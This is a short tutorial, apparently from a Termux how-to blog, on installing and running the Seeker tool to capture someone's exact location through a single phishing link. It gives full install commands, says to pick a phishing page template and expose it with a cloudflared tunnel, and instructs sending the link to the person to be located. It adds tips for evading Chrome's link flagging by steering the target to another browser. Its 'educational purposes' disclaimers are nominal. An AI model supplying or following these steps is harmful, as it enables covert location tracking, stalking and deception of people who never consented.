Seeker : Get the Exact Location using a Single Link with Termux :
Installation Commands :-
pkg update && pkg upgrade -y
pkg install cloudflared git -y
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker
chmod +x install.sh
./install.sh
If it is asking, do you want to continue? Then Type Y and press Enter.
Ok, Now The Tool Is Installed In Your Termux Application.
Use Seeker Tool in Termux :-
python seeker.py
Now you will see the main menu of the Seeker tool. Here you will have options to select a template, and these templates are just different types of Phishing Pages to create a link that will get the location for you. You can try all of them one by one and see which one suits you best. For demonstration, I will choose the number 0.
💢After step 2 the tool is running a local host server, and now you just have to create a tunnel from our local host to the internet. For this, we will use a single command. Firstly open a new session in your termux (to open a new session you just have to swipe from the left side of your screen to the right in the termux terminal and then click on the new session) and just copy and paste the below command.
cloudflared tunnel --url http://127.0.0.1:8080
The above command will start a cloudflared tunnel, and we will get a link as you can see below screenshot, just copy that link and send it to the person you want to get the location of (please don't use this for illegal purposes, you can get in big trouble).
Tip: Since Chrome is flagging links when they receive data while login, these links created by any port forwarding method won't work twice, so you can either make sure you get your data on the first try else you have to recreate the link. Or you can just tell the user to use any other browser rather than chrome or google. Also, keep in mind that Everything in this post is only for educational purposes, so never misuse this information.